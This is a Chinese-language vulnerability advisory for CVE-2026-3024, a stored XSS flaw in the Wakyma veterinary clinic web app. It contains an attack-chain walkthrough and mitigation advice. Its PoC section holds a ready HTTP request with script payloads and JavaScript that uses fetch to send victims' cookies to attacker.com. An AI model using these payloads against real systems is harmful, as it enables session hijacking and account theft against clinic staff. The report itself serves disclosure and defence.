IPBUF安全漏洞报告
English
CVE-2026-3024 CVSS 5.4 中危

CVE-2026-3024 Wakyma应用存储型XSS漏洞

披露日期: 2026-03-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-3024
漏洞类型
存储型跨站脚本攻击(XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Wakyma Web Application

相关标签

存储型XSSWakyma跨站脚本会话劫持CVSS 5.4中危漏洞Web应用安全兽医管理系统

漏洞概述

CVE-2026-3024是Wakyma兽医诊所Web应用程序中的一个存储型跨站脚本(XSS)安全漏洞。该漏洞位于 vets.wakyma.com/configuracion/agenda/modelo-formulario-evento 端点。攻击者通过利用此漏洞,可以在系统中注入恶意脚本代码,这些代码会被永久存储在服务器端。当其他用户访问受影响页面时,恶意脚本会自动执行,从而实现窃取会话令牌、劫持用户账户、篡改页面内容或进行钓鱼攻击等恶意操作。漏洞具有低权限认证要求,且需要用户交互才能触发,但一旦被利用,将影响整个兽医团队成员,威胁系统数据安全和用户隐私。

技术细节

该存储型XSS漏洞存在于Wakyma应用的日程表单创建功能中。攻击者首先需要拥有创建个性化账户的权限,然后构造包含恶意JavaScript代码的调查问卷或表单模板。由于应用程序未对用户输入进行充分的输入验证和输出编码,恶意脚本被直接存储在数据库中。当兽医团队其他成员访问相关页面时,服务器将存储的恶意内容无差别地返回给客户端浏览器,导致脚本在受害者浏览器上下文中执行。攻击者可利用此获取受害者的认证Cookie、模拟用户操作、窃取敏感数据或传播恶意内容。CVSS 3.1评分5.4体现了该漏洞通过网络可达、需要低权限认证、依赖用户交互但影响范围有限的特点。

攻击链分析

STEP 1
步骤1: 侦察与权限获取
攻击者获取Wakyma系统账户,具备创建个性化调查问卷的权限
STEP 2
步骤2: 构造恶意Payload
攻击者在调查问卷名称、描述或表单字段中注入恶意JavaScript代码,如<script>alert(document.cookie)</script>
STEP 3
步骤3: 存储恶意脚本
应用程序未进行输入验证,将包含XSS payload的内容存储到数据库中
STEP 4
步骤4: 等待受害者访问
当其他团队成员或管理员访问受影响页面时,服务器从数据库读取并返回恶意内容
STEP 5
步骤5: 脚本执行与攻击完成
受害者浏览器执行恶意脚本,攻击者窃取会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2026-3024 Stored XSS PoC --> <!-- Target: vets.wakyma.com/configuracion/agenda/modelo-formulario-evento --> <!-- Step 1: Create malicious survey with XSS payload --> POST /api/surveys HTTP/1.1 Host: vets.wakyma.com Content-Type: application/json { "survey_name": "<script>alert(document.cookie)</script>", "survey_description": "<img src=x onerror='fetch(\"https://attacker.com/steal?c=\"+document.cookie)'>", "form_template": "modelo-formulario-evento" } <!-- Step 2: When victim views the survey --> <!-- The stored XSS payload executes in victim's browser --> <!-- Example XSS payload for session hijacking --> <script> var cookies = document.cookie; fetch('https://attacker.com/log?cookie=' + btoa(cookies)); </script>

影响范围

Wakyma Web Application (具体版本待确认)

防御指南

临时缓解措施
在官方补丁发布前,可采取以下临时措施:1)限制创建调查问卷的权限,仅允许可信管理员操作;2)在Web应用防火墙(WAF)层面配置XSS防护规则;3)对 vets.wakyma.com/configuracion/agenda/modelo-formulario-evento 端点实施严格的输入验证;4)启用浏览器的XSS过滤器;5)监控异常请求和脚本注入尝试日志。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表